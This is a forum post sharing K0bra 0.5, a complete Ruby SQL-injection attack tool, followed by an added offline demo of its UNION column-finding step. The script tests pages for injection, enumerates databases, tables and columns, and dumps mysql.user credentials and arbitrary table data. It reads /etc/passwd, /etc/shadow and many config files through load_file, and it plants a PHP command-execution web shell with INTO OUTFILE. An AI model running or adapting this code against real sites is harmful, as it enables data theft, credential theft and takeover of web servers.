[Ruby] K0bra 0.5
Author: BigBear
Posted: 24 July 2015, 18:12

Improved version of this Ruby script for scanning a page for the SQLI vulnerability.

The script has the following options:

  • Check vulnerability
  • Find the number of columns
  • Automatically find the column number that displays data
  • Show tables
  • Show columns
  • Show databases
  • Show tables of another DB
  • Show columns of a table of another DB
  • Show users from mysql.user
  • Search for files using load_file
  • Show a file using load_file
  • Show values
  • Show information about the DB
  • Create a shell using outfile
  • Everything is saved in ordered logs

The code:

Code:

#!/usr/bin/env ruby
# K0bra 0.5
# (C) Doddy Hackman 2015

require "uri"
require "net/http"
require "open-uri"

# Paths tried, in order, by the load_file() fuzzer (menu option 9).
$files = [
  'C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt',
  '../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini',
  '/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab',
  '/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf',
  '/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0',
  '/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php',
  '/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log',
  '/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log',
  '/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log',
  '/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log',
  '/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log',
  '/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log',
  '/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits',
  '/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log',
  '/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log',
  '/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log',
  '/var/log/httpd/access.log','/var/log/httpd/error.log',
  '/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log',
  '/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log',
  'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log',
  '/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf',
  '/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf',
  '/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf',
  '/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf',
  '/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf',
  '/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf',
  '/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf',
  'C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf',
  '/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php',
  '/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf',
  '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',
  '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',
  '/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini',
  '/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini',
  '/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini',
  '/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini',
  '/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini',
  'c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini',
  'c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini',
  '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',
  '/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log',
  '/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config',
  '/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log',
  '/var/mysql.log','/var/lib/mysql/my.cnf',
  'C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log',
  'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log',
  'C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log',
  'C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log',
  'C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf',
  'C:\MySQL\my.ini','C:\MySQL\my.cnf',
  '/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf',
  '/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log',
  '/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog',
  '/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf',
  '/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb',
  '/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb',
  '/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log',
  '/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts',
  '/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog'
]

# Fetch a URL with a browser-looking User-Agent. Any failure (network error,
# non-2xx status, bad URL) returns the string "Error" so the callers' regex
# checks simply fail to match.
def toma(web)
  URI.open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue StandardError
  "Error"
end

# "0x48656c6c6f" -> "Hello"
def decode_hex(text)
  text = text.sub("0x", "")
  [text].pack('H*')
end

# "Hello" -> "0x48656c6c6f". Used so table/db/file names can be injected as
# MySQL hex literals, which need no quote characters.
def encode_hex(text)
  "0x" + text.unpack('H*')[0]
end

def copyright()
  print "\n-- == (C) Doddy Hackman 2015 == --\n"
  gets.chomp
  exit(1)
end

# Create the logs_webs/ directory next to the current working directory.
def installer()
  dir = Dir.pwd + "/logs_webs"
  Dir.mkdir(dir) unless File.directory?(dir)
end

# Append a line to logs_webs/<target host>.txt
def savefile(url, text)
  host = URI.parse(url).host
  File.open("logs_webs/" + host + ".txt", "a") do |save|
    save.puts text + "\n"
  end
end

# Returns [separator, comment] for the chosen bypass style.
def bypass(op)
  if op == "--"
    return "+", "--"
  elsif op == "/*"
    return "/**/", "/**/"
  elsif op == "%20"
    return "%20", "%00"
  else
    return "+", "--"
  end
end

def head()
  clean()
  print "
 
@      @@   @            
@@     @  @ @@            
@ @@  @  @  @ @   @ @ @@@
@ @   @  @  @@ @ @@@ @  @
@@    @  @  @  @  @   @@@
@ @   @  @  @  @  @  @  @
@@@ @   @@   @@@  @@@ @@@@@
 
"
end

def volverinicio()
  print "\n\n[+] Press any key to continue\n\n"
  gets.chomp
  inicio()
end

# Clear the terminal. Only real Windows builds use "cls"; the old /win/ test
# also matched "darwin" (macOS), so the platform check is narrowed here.
def clean()
  if RUBY_PLATFORM =~ /mswin|mingw|cygwin/
    system("cls")
  else
    system("clear")
  end
end

def retorno(url, by)
  print "\n[+] Finished"
  print "\n\n[+] Press any key to continue\n\n"
  gets.chomp
  central(url, by)
end

# All enumeration functions follow the same pattern: the placeholder "hackman"
# in the working injection URL is replaced by an expression that wraps the
# wanted value in the sentinel K0BRA (0x4b30425241), first a count(), then
# one row at a time with "limit N,1", and the value is pulled out of the
# page with /K0BRA(.*?)K0BRA/.
def gettables(url, by)
  pass1, pass2 = bypass(by)
  web1 = url.sub(/hackman/, "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
  web2 = url.sub(/hackman/, "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  print "\n[+] Getting tables ...\n\n"
  code1 = toma(web1 + pass1 + "from" + pass1 + "information_schema.tables" + pass2)
  if code1 =~ /K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Tables Found : ", total, "\n\n"
    savefile(url, "\n[+] Tables Found : #{total}\n")
    (0...total.to_i).each do |num|
      code2 = toma(web2 + pass1 + "from" + pass1 + "information_schema.tables" + pass1 + "limit" + pass1 + num.to_s + ",1" + pass2)
      if code2 =~ /K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Table Found : " + table + "\n"
        savefile(url, "[+] Table Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def getcolumns(url, by, tablex)
  tablexa = encode_hex(tablex)
  pass1, pass2 = bypass(by)
  web1 = url.sub(/hackman/, "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
  web2 = url.sub(/hackman/, "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  print "\n[+] Getting columns ...\n\n"
  code1 = toma(web1 + pass1 + "from" + pass1 + "information_schema.columns" + pass1 + "where" + pass1 + "table_name=" + tablexa + pass2)
  if code1 =~ /K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Columns Found : ", total, "\n\n"
    savefile(url, "\n[+] Table : #{tablex}")
    savefile(url, "[+] Columns Found : #{total}\n")
    (0...total.to_i).each do |num|
      code2 = toma(web2 + pass1 + "from" + pass1 + "information_schema.columns" + pass1 + "where" + pass1 + "table_name=" + tablexa + pass1 + "limit" + pass1 + num.to_s + ",1" + pass2)
      if code2 =~ /K0BRA(.*?)K0BRA/
        column = $1
        print "[+] Column Found : " + column + "\n"
        savefile(url, "[+] Column Found : #{column}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def getdbs(url, by)
  pass1, pass2 = bypass(by)
  web1 = url.sub(/hackman/, "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/, "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
  print "\n[+] Getting DBS ...\n\n"
  code1 = toma(web1 + pass1 + "from" + pass1 + "information_schema.schemata" + pass2)
  if code1 =~ /K0BRA(.*?)K0BRA/
    total = $1
    print "[+] DBS Found : ", total, "\n\n"
    savefile(url, "\n[+] DBS Found : #{total}\n")
    (0...total.to_i).each do |num|
      code2 = toma(web2 + pass1 + "from" + pass1 + "information_schema.schemata" + pass1 + "limit" + pass1 + num.to_s + ",1" + pass2)
      if code2 =~ /K0BRA(.*?)K0BRA/
        db = $1
        print "[+] DB Found : " + db + "\n"
        savefile(url, "[+] DB Found : #{db}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def gettablesbydb(url, by, dbx)
  data = encode_hex(dbx)
  pass1, pass2 = bypass(by)
  web1 = url.sub(/hackman/, "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/, "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  print "\n[+] Getting tables ...\n\n"
  code1 = toma(web1 + pass1 + "from" + pass1 + "information_schema.tables" + pass1 + "where" + pass1 + "table_schema=" + data + pass2)
  if code1 =~ /K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Tables Found : ", total, "\n\n"
    savefile(url, "\n[+] DBS : #{dbx}")
    savefile(url, "[+] Tables Found : #{total}\n")
    (0...total.to_i).each do |num|
      code2 = toma(web2 + pass1 + "from" + pass1 + "information_schema.tables" + pass1 + "where" + pass1 + "table_schema=" + data + pass1 + "limit" + pass1 + num.to_s + ",1" + pass2)
      if code2 =~ /K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Table Found : " + table + "\n"
        savefile(url, "[+] Table Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def getcolumnsbydb(url, by, db, tab)
  data = encode_hex(db)
  tabx = encode_hex(tab)
  pass1, pass2 = bypass(by)
  web1 = url.sub(/hackman/, "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/, "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  print "\n[+] Getting columns ...\n\n"
  code1 = toma(web1 + pass1 + "from" + pass1 + "information_schema.columns" + pass1 + "where" + pass1 + "table_name=" + tabx + pass1 + "and" + pass1 + "table_schema=" + data + pass2)
  if code1 =~ /K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Columns Found : ", total, "\n\n"
    savefile(url, "\n[+] DB : #{db}")
    savefile(url, "[+] Table : #{tab}")
    savefile(url, "[+] Columns Found : #{total}\n")
    (0...total.to_i).each do |num|
      code2 = toma(web2 + pass1 + "from" + pass1 + "information_schema.columns" + pass1 + "where" + pass1 + "table_name=" + tabx + pass1 + "and" + pass1 + "table_schema=" + data + pass1 + "limit" + pass1 + num.to_s + ",1" + pass2)
      if code2 =~ /K0BRA(.*?)K0BRA/
        column = $1
        print "[+] Column Found : " + column + "\n"
        savefile(url, "[+] Column Found : #{column}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

# Dump Host/User/Password from mysql.user. The extra sentinels K0BRA1
# (0x4B3042524131) and K0BRA2 (0x4B3042524132) separate the three fields.
def mysqluser(url, by)
  pass1, pass2 = bypass(by)
  web1 = url.sub(/hackman/, "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/, "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
  print "\n[+] Searching mysql.user\n\n"
  code1 = toma(web1 + pass1 + "from" + pass1 + "mysql.user" + pass2)
  if code1 =~ /K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Users Mysql Found : ", total, "\n\n"
    savefile(url, "[+] Users Mysql Found : " + total + "\n")
    (0...total.to_i).each do |num|
      code2 = toma(web2 + pass1 + "from" + pass1 + "mysql.user" + pass1 + "limit" + pass1 + num.to_s + ",1" + pass2)
      if code2 =~ /K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
        host, user, passw = $1, $2, $3
        print "[Host] : " + host
        print " [User] : " + user
        print " [Pass] : " + passw + "\n"
        savefile(url, "[Host] : " + host)
        savefile(url, "[User] : " + user)
        savefile(url, "[Pass] : " + passw + "\n")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

# user()/database()/version(), plus three capability checks: mysql.user
# readable, information_schema readable, load_file() working.
def details(url, by)
  pass1, pass2 = bypass(by)
  # hextest = "0x2f6574632f706173737764" # /etc/passwd (use this one for Linux targets)
  hextest = "0x633A2F78616D70702F726561642E747874" # c:/xampp/read.txt
  web1 = url.sub(/hackman/, "0x4b30425241")
  web2 = url.sub(/hackman/, "concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  web3 = url.sub(/hackman/, "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + hextest + "))))")
  print "\n[+] Extracting information of the DB\n"
  code1 = toma(web2)
  if code1 =~ /K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
    user, data, ver = $1, $2, $3
    print "\n[+] Username : " + user
    print "\n[+] Database : " + data
    print "\n[+] Version : " + ver + "\n\n"
    savefile(url, "\n[+] Username : " + user)
    savefile(url, "[+] Database : " + data)
    savefile(url, "[+] Version : " + ver + "\n")
  else
    print "[-] Not Found\n"
  end
  code2 = toma(web1 + pass1 + "from" + pass1 + "mysql.user" + pass2)
  code3 = toma(web1 + pass1 + "from" + pass1 + "information_schema.tables" + pass2)
  code4 = toma(web3)
  if code2 =~ /K0BRA/
    print "[+] Mysql User : ON\n"
    savefile(url, "[+] Mysqluser : ON")
  end
  if code3 =~ /K0BRA/
    print "[+] information_schema : ON\n"
    savefile(url, "[+] information_schema : ON")
  end
  if code4 =~ /ERTOR854/
    print "[+] load_file : ON\n"
    savefile(url, "[+] load_file : ON")
  end
  savefile(url, "") # blank line
end

# Dump two columns of a table, one row per request.
def dumper(url, by, table, col1, col2)
  pass1, pass2 = bypass(by)
  web1 = url.sub(/hackman/, "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/, "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))")
  print "\n[+] Getting Values ...\n\n"
  code1 = toma(web1 + pass1 + "from" + pass1 + table + pass2)
  if code1 =~ /K0BRA(.*?)K0BRA/
    total = $1
    savefile(url, "\n[+] Table : " + table)
    savefile(url, "[+] Column 1 : " + col1)
    savefile(url, "[+] Column 2 : " + col2)
    print "[+] Values Found : ", total, "\n"
    savefile(url, "\n[+] Values Found : #{total}\n")
    (0...total.to_i).each do |num|
      code2 = toma(web2 + pass1 + "from" + pass1 + table + pass1 + "limit" + pass1 + num.to_s + ",1" + pass2)
      if code2 =~ /K0BRA(.*)K0BRA(.*)K0BRA/
        uno, dos = $1, $2
        print "\n[+] " + col1 + " : " + uno + "\n"
        print "[+] " + col2 + " : " + dos + "\n"
        savefile(url, "\n[+] " + col1 + " : " + uno)
        savefile(url, "[+] " + col2 + " : " + dos)
      end
    end
  else
    print "[-] Not Found\n"
  end
end

# Try every path in $files through load_file(); file contents are wrapped in
# the sentinel ERTOR854 (char(69,82,84,79,82,56,53,52)).
def fuzzfile(url, by)
  pass1, pass2 = bypass(by)
  print "\n[+] Fuzzing Files with load_file ....\n"
  $files.each do |file|
    res = file
    file = encode_hex(file.chomp)
    web1 = url.sub(/hackman/, "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + file + "),char(69,82,84,79,82,56,53,52))))")
    code = toma(web1)
    if code =~ /ERTOR854(.*?)ERTOR854/m
      print "\n\n[File Found] : ", res
      print "\n\n[Source Start]\n"
      print $1
      print "\n[Source End]"
      savefile(url, "\n[File Found] : " + res)
      savefile(url, "\n[Source Start]\n")
      savefile(url, $1)
      savefile(url, "\n[Source End]")
    end
  end
  print "\n"
end

def abrirfile(url, by, file)
  pass1, pass2 = bypass(by)
  print "\n[+] Opening file ....\n"
  res = file
  file = encode_hex(file)
  web1 = url.sub(/hackman/, "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + file + "),char(69,82,84,79,82,56,53,52))))")
  code = toma(web1)
  if code =~ /ERTOR854(.*?)ERTOR854/m
    print "\n\n[File Found] : ", res
    print "\n\n[Source Start]\n"
    print $1
    print "\n[Source End]\n"
    savefile(url, "\n[File Found] : " + res)
    savefile(url, "\n[Source Start]\n")
    savefile(url, $1)
    savefile(url, "\n[Source End]\n")
  else
    print "\n\n[-] Error\n\n"
  end
end

# Write a one-line PHP shell with "into outfile" and check it is reachable.
def into(url, by, full, dir)
  pass1, pass2 = bypass(by)
  # hex of: <title>Mini Shell By Doddy</title><?php if (isset($_GET['cmd'])) { system($_GET['cmd']);}?>
  linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  lugar = full + "/cmd.php"        # filesystem path (needs the full path disclosure)
  lugardos = dir + "/cmd.php"      # web path to test afterwards
  h = URI.parse(url)
  webtest = "#{h.scheme}://#{h.host}#{lugardos}"
  web1 = url.sub(/hackman/, linea)
  formandoweb = web1 + pass1 + "into" + pass1 + "outfile" + pass1 + "'" + lugar + "'" + pass2
  toma(formandoweb)
  code = toma(webtest)
  if code =~ /Mini Shell By Doddy/
    print "\n[Shell Up] : " + webtest + "\n"
    savefile(url, "\n[Shell Up] : " + webtest + "\n")
  else
    print "\n\n[-] Error\n"
  end
end

def central(url, by)
  clean()
  head()
  print "\n\n[+] Page : #{url}\n"
  print "[+] ByPass : #{by}\n\n"

  print "\n[information_schema]\n\n"
  print "1 - Show tables\n"
  print "2 - Show columns of a table\n"
  print "3 - Show databases\n"
  print "4 - Show tables from a DB\n"
  print "5 - Show columns from a table of a DB\n"
  print "\n[mysql.user]\n\n"
  print "6 - Show users\n"
  print "\n[Others]\n\n"
  print "7 - Show details\n"
  print "8 - Dump data\n"
  print "9 - Fuzz Files with load_file\n"
  print "10 - Load files with load_file\n"
  print "11 - Create Shell\n"
  print "12 - Show log\n"
  print "13 - Change target\n"
  print "14 - Exit\n\n\n"

  print "[+] Option : "
  op = gets.chomp
  print "\n"

  if op == "1"
    gettables(url, by)
    retorno(url, by)
  elsif op == "2"
    print "\n[+] Table : "
    table = gets.chomp
    getcolumns(url, by, table)
    retorno(url, by)
  elsif op == "3"
    getdbs(url, by)
    retorno(url, by)
  elsif op == "4"
    print "\n[+] DB : "
    db = gets.chomp
    gettablesbydb(url, by, db)
    retorno(url, by)
  elsif op == "5"
    print "\n[+] DB : "
    db = gets.chomp
    print "\n[+] Table : "
    tab = gets.chomp
    getcolumnsbydb(url, by, db, tab)
    retorno(url, by)
  elsif op == "6"
    mysqluser(url, by)
    retorno(url, by)
  elsif op == "7"
    details(url, by)
    retorno(url, by)
  elsif op == "8"
    print "\n[+] Table : "
    table = gets.chomp
    print "\n[+] Column 1 : "
    col1 = gets.chomp
    print "\n[+] Column 2 : "
    col2 = gets.chomp
    dumper(url, by, table, col1, col2)
    retorno(url, by)
  elsif op == "9"
    fuzzfile(url, by)
    retorno(url, by)
  elsif op == "10"
    print "\n[+] File : "
    file = gets.chomp
    abrirfile(url, by, file)
    retorno(url, by)
  elsif op == "11"
    print "\n[Full Source Disclosure] : "
    full = gets.chomp
    print "\n[Directory to test] : "
    dir = gets.chomp
    into(url, by, full, dir)
    retorno(url, by)
  elsif op == "12"
    ar = "logs_webs/" + URI.parse(url).host + ".txt"
    if RUBY_PLATFORM =~ /mswin|mingw|cygwin/
      system("start #{ar}")     # "start" only exists on Windows
    elsif File.exist?(ar)
      puts File.read(ar)
    end
    retorno(url, by)
  elsif op == "13"
    inicio()
  elsif op == "14"
    copyright()
  else
    retorno(url, by)
  end
end

# Try "union select" with 2..25 columns, each column wrapped in the K0BRA
# sentinel; the first page that echoes a sentinel tells both the column count
# and which column is printed. That column becomes the "hackman" placeholder.
def findlength(url, by)
  pass1, pass2 = bypass(by)
  z = "1"
  print "\n[+] Finding columns length ...\n\n"
  x = "concat(0x4b30425241,1,0x4b30425241)"
  (2..25).each do |num|
    num = num.to_s
    z = z + "," + num
    x = x + "," + "concat(0x4b30425241," + num + ",0x4b30425241)"
    code = toma(url + "1" + pass1 + "and" + pass1 + "1=0" + pass1 + "union" + pass1 + "select" + pass1 + x)
    if code =~ /K0BRA(.*?)K0BRA/
      print "[+] The Page has " + num + " columns\n"
      print "[+] The number " + $1 + " print data"
      z = z.sub($1, "hackman")
      sqli = url + "1" + pass1 + "and" + pass1 + "1=0" + pass1 + "union" + pass1 + "select" + pass1 + z
      savefile(url, "[+] SQLI : " + sqli)
      savefile(url, "[+] Bypass : " + by + "\n")
      central(sqli, by)
    end
  end
  print "[-] Columns length not found\n"
  volverinicio()
end

# Boolean test: "and 1=0" and "and 1=1" should give different pages if the
# parameter is injectable.
def testvul(page, by)
  pass1, pass2 = bypass(by)
  print "\n\n[+] Testing vulnerability ...\n\n"
  codeuno = toma(page + "1" + pass1 + "and" + pass1 + "1=0" + pass2)
  codedos = toma(page + "1" + pass1 + "and" + pass1 + "1=1" + pass2)
  if codeuno != codedos
    print "[+] Vulnerable !\n"
    findlength(page, by)
  else
    print "[-] Not vulnerable\n"
    print "\n[+] Scan anyway y/n : "
    op = gets.chomp
    if op == "y"
      findlength(page, by)
    else
      volverinicio()
    end
  end
end

# Entry point. A URL that already contains the "hackman" placeholder skips
# straight to the menu; otherwise the vulnerability and column checks run.
def inicio()
  clean()
  head()
  print "\n\n[+] Page : "
  page = gets.chomp
  print "\n[+] Bypass : "
  by = gets.chomp
  if page =~ /hackman/
    central(page, by)
  else
    testvul(page, by)
  end
end

installer()
inicio()

# The End ?


That's all.
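Added example, not part of BigBear's post or of the K0bra script: the column-finding step that findlength() performs, isolated so it can be run offline. The HTTP layer is passed in as a callable, so the same logic works against a real target or, as here, against a constructed in-memory stand-in for a vulnerable page. The names (MARKER, hex_literal, build_union_payload, extract_marker, find_reflected_column, fake_vulnerable_page) are this example's own; the sentinel value and the payload shape are the ones the script uses.

```ruby
# Added example (not K0bra's own code). Demonstrates the UNION column-count
# probe: each candidate column is wrapped in a sentinel, and the first response
# that echoes a sentinel reveals both the column count and which column the
# page prints. Nothing here touches the network.

MARKER = "K0BRA"                           # sentinel used by the original script
MARKER_HEX = "0x" + MARKER.unpack1("H*")   # "0x4b30425241"

# Arbitrary string -> MySQL hex literal, so it can sit in a WHERE clause or
# a load_file() call without any quote character (same idea as encode_hex).
def hex_literal(str)
  "0x" + str.unpack1("H*")
end

# "1<sep>and<sep>1=0<sep>union<sep>select<sep>concat(M,1,M),concat(M,2,M),...<comment>"
# for n columns; sep/comment follow the script's bypass styles ("+"/"--", "/**/").
def build_union_payload(n, sep: "+", comment: "--")
  cols = (1..n).map { |i| "concat(#{MARKER_HEX},#{i},#{MARKER_HEX})" }
  ["1", "and", "1=0", "union", "select", cols.join(",")].join(sep) + comment
end

# First MARKER...MARKER value in a response body, or nil if none.
def extract_marker(body)
  m = body.match(/#{MARKER}(.*?)#{MARKER}/m)
  m && m[1]
end

# Try 1..max columns. `fetch` takes the full injected parameter value and
# returns the page body. Returns [column_count, reflected_column] or nil.
def find_reflected_column(fetch, max: 25, sep: "+", comment: "--")
  (1..max).each do |n|
    body = fetch.call(build_union_payload(n, sep: sep, comment: comment))
    hit = extract_marker(body)
    return [n, hit.to_i] if hit && hit =~ /\A\d+\z/
  end
  nil
end

# Constructed stand-in for a vulnerable page (assumed "+" separator): the
# query behind it has three columns and only the second one is rendered. A
# UNION with the wrong column count is a MySQL error and prints nothing; with
# the right count, the second SELECT expression is echoed into the HTML.
def fake_vulnerable_page(param)
  return "<html>error</html>" unless param =~ /union\+select\+(.*?)(--)?\z/
  exprs = $1.split(/,(?![^()]*\))/)          # split on commas outside parentheses
  return "<html>error</html>" unless exprs.size == 3
  # MySQL would evaluate concat(0x4b30425241,2,0x4b30425241) to "K0BRA2K0BRA"
  rendered = exprs[1].gsub(MARKER_HEX, MARKER).sub(/\Aconcat\((.*)\)\z/, '\1').delete(",")
  "<html><b>#{rendered}</b></html>"
end
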